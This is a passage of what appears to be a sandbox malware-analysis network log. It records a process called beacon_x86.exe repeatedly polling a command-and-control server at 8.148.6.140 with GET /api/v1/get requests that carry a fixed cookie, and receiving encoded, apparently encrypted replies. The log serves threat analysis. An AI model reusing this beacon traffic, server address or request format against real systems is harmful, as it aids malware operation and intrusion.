        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:04.608283997 CET248INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:04 GMT
        Server: nginx
        Content-Length: 64
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 58 76 7a 74 63 39 78 6b 54 56 77 31 2b 34 6f 75 53 73 50 76 77 57 48 2b 73 66 75 4f 38 42 6a 39 6b 77 45 2b 57 51 74 6a 30 64 61 6e 75 63 33 77 55 35 46 6a 32 6d 4e 6e 68 68 33 79 58 53 39 6e
        Data Ascii: Xvztc9xkTVw1+4ouSsPvwWH+sfuO8Bj9kwE+WQtj0danuc3wU5Fj2mNnhh3yXS9n


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        96192.168.2.8498068.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:04.717242002 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:05.652791023 CET505INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:05 GMT
        Server: nginx
        Content-Length: 320
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 6d 58 76 51 62 6a 4c 45 39 76 33 65 49 55 47 35 53 36 65 4a 79 65 6d 44 6e 65 57 4f 63 6b 65 70 37 46 35 42 30 59 2b 68 32 4f 42 39 4d 48 78 4e 6d 67 4a 43 30 76 6a 52 75 4b 52 36 32 6d 51 62 4d 6e 6a 59 65 76 6a 44 2b 71 72 33 64 49 2b 46 7a 6e 53 6e 46 79 6e 6d 34 62 4a 4c 79 64 78 73 61 39 33 6b 62 39 77 67 39 6a 4e 6f 72 54 32 72 66 44 66 55 63 55 61 71 55 68 51 56 38 68 69 7a 77 66 77 43 66 4a 4b 41 4c 4b 33 6e 34 73 57 52 47 70 41 74 44 53 49 67 71 35 77 61 73 5a 61 4e 35 54 2b 30 73 77 69 5a 68 36 61 75 43 6c 7a 58 69 4c 57 38 36 4d 73 71 6f 30 6e 54 30 37 78 47 4c 4b 4b 6e 34 58 46 76 49 51 76 2f 54 32 2b 66 69 37 56 57 73 68 37 52 47 50 54 58 55 7a 70 61 59 6a 53 31 4b 66 39 42 50 55 6a 54 61 55 52 75 65 55 31 52 71 43 51 54 68 45 41 37 43 38 54 67 61 50 51 5a 4d 78 67 2b 49 43 41 6e 33 6f 70 48 4d 4c 67 64 6a 76 6c 44 45 55 4c 6f 62 4f 30 75 37 6b 69 2f 6a 38 6d 64 43 6d 6b 6d 64 54 41 6d 54 4e 73 45 38 2f 70 67 70 43 42 59 56 57 46 45
        Data Ascii: mXvQbjLE9v3eIUG5S6eJyemDneWOckep7F5B0Y+h2OB9MHxNmgJC0vjRuKR62mQbMnjYevjD+qr3dI+FznSnFynm4bJLydxsa93kb9wg9jNorT2rfDfUcUaqUhQV8hizwfwCfJKALK3n4sWRGpAtDSIgq5wasZaN5T+0swiZh6auClzXiLW86Msqo0nT07xGLKKn4XFvIQv/T2+fi7VWsh7RGPTXUzpaYjS1Kf9BPUjTaURueU1RqCQThEA7C8TgaPQZMxg+ICAn3opHMLgdjvlDEULobO0u7ki/j8mdCmkmdTAmTNsE8/pgpCBYVWFE


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        97192.168.2.8498078.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:05.764166117 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:08.144260883 CET357INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:07 GMT
        Server: nginx
        Content-Length: 172
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 6a 51 46 5a 4a 65 61 6f 31 79 72 4c 77 44 7a 30 6d 74 68 36 6e 48 59 66 78 46 79 76 63 35 47 57 66 70 46 6f 45 64 51 47 4e 6d 42 2b 56 68 57 30 74 45 69 34 55 6d 77 61 44 61 38 77 48 69 56 64 46 33 55 34 42 66 44 6f 46 71 68 62 76 44 41 5a 4a 6b 77 32 2f 7a 6e 67 39 75 44 46 47 50 72 53 55 6a 66 31 61 43 48 4e 4a 2b 4f 73 6e 5a 49 77 63 4d 65 34 6e 71 6d 6e 6a 6e 39 62 41 57 53 30 35 6f 2f 6f 67 4e 73 57 4e 39 6f 53 76 6d 69 42 43 61 31 6d 44 63 77 75 6b 52 34 6b 54 74 33 77 42 54 55 31 77 66 69 79 63 56 51 3d
        Data Ascii: jQFZJeao1yrLwDz0mth6nHYfxFyvc5GWfpFoEdQGNmB+VhW0tEi4UmwaDa8wHiVdF3U4BfDoFqhbvDAZJkw2/zng9uDFGPrSUjf1aCHNJ+OsnZIwcMe4nqmnjn9bAWS05o/ogNsWN9oSvmiBCa1mDcwukR4kTt3wBTU1wfiycVQ=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        98192.168.2.8498088.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:08.267235041 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:09.416951895 CET185INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:09 GMT
        Server: nginx
        Content-Length: 320
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Jan 10, 2025 09:29:09.416963100 CET320INData Raw: 57 6f 55 33 55 2f 46 75 51 73 54 30 42 5a 53 7a 78 76 47 33 56 56 37 43 34 38 52 70 53 64 2f 6b 62 78 42 32 31 78 47 63 6a 6e 6e 41 4f 55 30 62 51 4c 49 47 49 7a 43 75 43 36 56 73 55 4d 73 46 33 6d 49 49 49 56 38 2f 54 34 4a 2b 6c 37 49 33 59 6f
        Data Ascii: WoU3U/FuQsT0BZSzxvG3VV7C48RpSd/kbxB21xGcjnnAOU0bQLIGIzCuC6VsUMsF3mIIIV8/T4J+l7I3YoQWYHr7TWaQjcsxptdEWuYfagkuGwZM5qc04bC08zfzUDZyPAvR1jE+OPYsFuD8Ai0hrE0jk5slJ/wQOqaPB+Zx0FbXFFVFDUrGJ3zLeUwAGP9ttt8cayUpTmdhu8SSk1e9nG4peKyuj0TETPiHCN0Ltgtc+/rHrDD


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        99192.168.2.8498098.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:09.531135082 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        100192.168.2.8498108.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:13.654551029 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:14.656960964 CET377INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:14 GMT
        Server: nginx
        Content-Length: 192
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 34 50 74 6c 77 33 66 56 43 45 52 6c 62 79 63 34 5a 66 44 64 63 59 46 74 56 78 53 46 4d 30 41 7a 41 41 4e 71 52 65 61 34 37 4e 75 4d 35 2b 4f 34 59 61 32 77 6d 6d 43 46 6a 5a 72 42 42 77 2f 4f 4f 43 73 52 2f 6a 4a 4a 63 51 44 41 75 62 6d 49 4e 77 54 4f 44 4e 46 2f 34 4e 68 46 32 33 4d 75 6b 4f 76 74 64 47 50 70 4c 4e 4e 56 37 75 6c 6e 63 55 37 35 31 54 6d 2f 59 68 4b 31 47 34 77 4d 77 43 32 6e 48 53 46 31 73 4a 33 50 63 6b 79 36 31 35 74 6d 6d 49 4a 32 56 65 58 67 54 76 51 46 4b 69 30 4f 42 77 31 6f 51 39 67 45 4d 79 47 4c 5a 67 76 30 36 4d 72 7a 4b 71 68 35 32 56 68 4d
        Data Ascii: 4Ptlw3fVCERlbyc4ZfDdcYFtVxSFM0AzAANqRea47NuM5+O4Ya2wmmCFjZrBBw/OOCsR/jJJcQDAubmINwTODNF/4NhF23MukOvtdGPpLNNV7ulncU751Tm/YhK1G4wMwC2nHSF1sJ3Pcky615tmmIJ2VeXgTvQFKi0OBw1oQ9gEMyGLZgv06MrzKqh52VhM


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        101192.168.2.8498118.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:14.779822111 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:15.778203964 CET441INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:15 GMT
        Server: nginx
        Content-Length: 256
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 33 4c 36 46 63 55 73 64 52 63 74 6b 70 76 32 4f 68 69 52 65 34 69 6f 4d 31 4e 6d 6d 46 36 68 30 6d 77 7a 64 4a 7a 71 55 75 31 39 4f 35 4b 37 59 67 39 67 36 50 6b 37 6b 71 35 4c 2f 41 35 37 47 67 59 73 57 6d 4e 37 53 30 67 38 70 33 67 35 53 45 36 70 57 53 43 55 74 4d 2f 33 61 65 54 61 79 35 6b 30 5a 75 57 54 6d 42 51 31 69 42 42 4e 33 32 69 67 66 53 7a 56 78 56 51 66 67 7a 4d 68 78 34 38 62 58 41 66 69 6e 57 50 63 39 4f 4c 7a 7a 78 68 52 47 50 75 45 64 44 46 51 70 33 44 37 55 45 69 31 75 45 46 55 65 70 51 38 57 76 2b 69 71 31 2f 31 50 62 38 35 2b 5a 72 57 79 44 41 53 61 74 34 68 2b 66 33 77 56 70 4b 54 4f 33 52 58 38 57 4c 6d 53 4d 50 62 2f 6d 47 4b 78 32 6e 36 47 39 77 4a 45 37 38 50 33 72 2b 74 6b 48 56 4a 67 37 6b 37 45 45 51 49 4a 43 6a 79 43 47 62 49 38
        Data Ascii: 3L6FcUsdRctkpv2OhiRe4ioM1NmmF6h0mwzdJzqUu19O5K7Yg9g6Pk7kq5L/A57GgYsWmN7S0g8p3g5SE6pWSCUtM/3aeTay5k0ZuWTmBQ1iBBN32igfSzVxVQfgzMhx48bXAfinWPc9OLzzxhRGPuEdDFQp3D7UEi1uEFUepQ8Wv+iq1/1Pb85+ZrWyDASat4h+f3wVpKTO3RX8WLmSMPb/mGKx2n6G9wJE78P3r+tkHVJg7k7EEQIJCjyCGbI8


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        102192.168.2.8498128.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:15.896365881 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:16.884021997 CET401INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:16 GMT
        Server: nginx
        Content-Length: 216
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 34 46 69 5a 53 74 71 72 42 30 59 67 67 54 59 4a 32 70 6a 43 46 62 30 49 50 4c 48 62 74 56 51 7a 35 6e 55 30 6f 73 47 4f 53 75 4f 43 37 30 32 6b 53 50 46 79 58 2b 2b 4d 71 4c 59 68 52 52 47 71 49 56 4e 35 34 32 54 2b 79 39 41 57 6f 4e 79 56 65 4a 68 7a 79 52 67 61 37 72 70 32 61 41 42 64 32 45 2f 52 65 69 74 35 43 6e 46 30 57 6d 62 75 74 42 77 38 55 72 61 30 32 71 46 4c 37 53 5a 4c 34 65 4c 49 41 45 63 41 78 56 61 46 50 79 4a 38 5a 35 72 79 38 34 69 52 59 45 62 54 79 46 39 61 58 43 6c 61 43 45 70 5a 70 75 67 5a 77 49 70 6e 4a 75 66 4e 4e 4a 50 4a 79 42 2b 6c 59 59 79 47 48 2b 4b 55 34 41 76 32 5a 53 5a 36 79 33 79 35 48 36 51 64 57 51 3d 3d
        Data Ascii: 4FiZStqrB0YggTYJ2pjCFb0IPLHbtVQz5nU0osGOSuOC702kSPFyX++MqLYhRRGqIVN542T+y9AWoNyVeJhzyRga7rp2aABd2E/Reit5CnF0WmbutBw8Ura02qFL7SZL4eLIAEcAxVaFPyJ8Z5ry84iRYEbTyF9aXClaCEpZpugZwIpnJufNNJPJyB+lYYyGH+KU4Av2ZSZ6y3y5H6QdWQ==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        103192.168.2.8498138.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:17.001980066 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:18.007044077 CET357INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:17 GMT
        Server: nginx
        Content-Length: 172
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 45 47 57 54 39 68 6e 69 4f 73 57 4c 31 68 4e 6c 45 6c 4d 72 43 55 39 6a 53 4e 34 37 5a 61 78 7a 52 46 55 67 77 49 2b 4d 4a 75 75 55 55 37 2b 78 6f 33 4e 4a 4d 32 64 33 42 6d 70 41 39 7a 6c 41 6f 74 69 68 37 59 4a 51 63 53 6e 33 67 6a 36 4e 35 79 55 68 6e 69 38 54 76 37 67 5a 4d 39 74 63 72 69 70 75 77 51 42 33 6e 30 6c 78 75 73 79 58 46 35 74 72 53 43 57 4b 74 30 42 6a 33 58 33 65 39 48 32 6b 72 4e 72 70 38 6b 51 69 2f 52 52 4a 78 6f 70 47 62 50 57 34 70 38 44 6a 6f 79 46 50 49 72 63 35 6b 5a 79 32 71 6e 63 3d
        Data Ascii: EGWT9hniOsWL1hNlElMrCU9jSN47ZaxzRFUgwI+MJuuUU7+xo3NJM2d3BmpA9zlAotih7YJQcSn3gj6N5yUhni8Tv7gZM9tcripuwQB3n0lxusyXF5trSCWKt0Bj3X3e9H2krNrp8kQi/RRJxopGbPW4p8DjoyFPIrc5kZy2qnc=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        104192.168.2.8498148.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:18.125232935 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:19.134562969 CET529INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:18 GMT
        Server: nginx
        Content-Length: 344
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 6f 70 39 34 71 56 79 79 42 61 4b 37 67 76 46 52 2b 38 59 6e 46 58 54 4b 67 64 2f 49 6e 68 32 67 4c 61 43 44 32 75 75 6c 50 59 35 48 6d 72 33 77 56 2f 72 51 34 6d 59 6d 67 54 67 6c 4c 70 45 79 48 68 38 6f 5a 46 6e 4e 39 63 48 2b 30 4c 7a 70 6a 42 51 4e 33 48 39 6f 59 75 72 37 49 5a 33 51 2f 36 68 59 33 57 6a 7a 68 57 6f 56 72 33 77 30 36 57 50 49 4e 30 46 4d 38 2b 45 42 70 72 51 38 45 35 62 30 52 53 61 42 43 4c 6c 75 74 51 43 2b 7a 69 68 67 72 78 39 6b 51 62 6d 59 51 54 71 33 41 79 51 66 71 50 6c 37 49 4b 53 58 38 52 62 46 76 65 55 75 41 43 79 31 73 59 6b 59 64 75 6a 6f 72 44 4b 39 65 67 6c 61 56 49 42 45 50 57 63 4e 6f 6c 46 39 49 50 6c 4f 61 79 6c 35 74 32 4e 41 78 79 6c 79 2f 48 4d 35 32 58 6a 35 57 57 78 37 35 71 34 77 63 63 70 47 76 79 78 53 37 37 61 59 79 78 4e 56 70 53 32 70 6b 63 6c 67 74 49 4a 74 63 57 56 6d 51 73 76 4a 4b 6f 35 4a 39 74 32 42 55 72 6d 43 66 37 52 4d 51 62 79 35 70 43 74 46 68 62 39 57 49 37 72 58 6e 46 6c 30 4c 73 50 59 4b 67 4a 44 6f 51 55 41 42 59 70 41 6d 64 72 46 75 42 [TRUNCATED]
        Data Ascii: op94qVyyBaK7gvFR+8YnFXTKgd/Inh2gLaCD2uulPY5Hmr3wV/rQ4mYmgTglLpEyHh8oZFnN9cH+0LzpjBQN3H9oYur7IZ3Q/6hY3WjzhWoVr3w06WPIN0FM8+EBprQ8E5b0RSaBCLlutQC+zihgrx9kQbmYQTq3AyQfqPl7IKSX8RbFveUuACy1sYkYdujorDK9eglaVIBEPWcNolF9IPlOayl5t2NAxyly/HM52Xj5WWx75q4wccpGvyxS77aYyxNVpS2pkclgtIJtcWVmQsvJKo5J9t2BUrmCf7RMQby5pCtFhb9WI7rXnFl0LsPYKgJDoQUABYpAmdrFuBngEg==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        105192.168.2.8498158.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:19.249758005 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:20.260967970 CET377INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:20 GMT
        Server: nginx
        Content-Length: 192
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 35 68 4e 45 6c 55 41 66 52 69 50 31 74 6c 63 52 48 2f 62 70 66 6c 4f 4e 31 56 52 49 6b 70 33 4b 6e 6f 6c 62 6e 68 50 39 42 39 54 54 30 70 41 67 70 79 37 7a 63 30 39 5a 52 6f 76 79 75 2f 2f 6d 42 4a 6a 49 5a 45 37 59 67 6c 6e 34 4e 72 65 69 54 6f 72 38 6e 52 50 6a 45 4c 7a 31 4b 43 44 53 6b 4e 65 45 66 45 59 34 5a 4f 63 65 4f 64 4b 2b 4a 41 6d 6c 57 38 5a 56 4b 41 5a 71 71 76 79 6a 54 2f 53 46 53 65 62 4b 2b 34 5a 69 6b 75 78 44 65 2b 6c 64 69 45 78 64 6a 79 33 49 6a 76 6f 46 71 6e 46 47 61 51 57 31 4a 6f 35 78 52 7a 33 4f 4c 67 47 36 65 35 50 34 4b 52 39 38 66 45 72 56
        Data Ascii: 5hNElUAfRiP1tlcRH/bpflON1VRIkp3KnolbnhP9B9TT0pAgpy7zc09ZRovyu//mBJjIZE7Ygln4NreiTor8nRPjELz1KCDSkNeEfEY4ZOceOdK+JAmlW8ZVKAZqqvyjT/SFSebK+4ZikuxDe+ldiExdjy3IjvoFqnFGaQW1Jo5xRz3OLgG6e5P4KR98fErV


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        106192.168.2.8498168.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:20.409785986 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:29:21.353132963 CET272INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:29:21 GMT
        Server: nginx
        Content-Length: 88
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 44 32 62 65 5a 33 59 37 48 4f 48 43 4d 5a 74 46 44 32 53 77 79 59 66 45 70 4f 47 76 50 4b 68 77 30 71 47 58 72 4e 2f 4e 63 41 38 6b 4e 59 41 55 34 69 4f 31 58 7a 30 31 49 6d 42 66 67 50 32 78 31 65 4a 47 30 59 70 66 79 33 79 56 2b 71 76 34 55 75 38 38 62 67 3d 3d
        Data Ascii: D2beZ3Y7HOHCMZtFD2SwyYfEpOGvPKhw0qGXrN/NcA8kNYAU4iO1Xz01ImBfgP2x1eJG0Ypfy3yV+qv4Uu88bg==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        107192.168.2.8498178.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:29:21.468386889 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
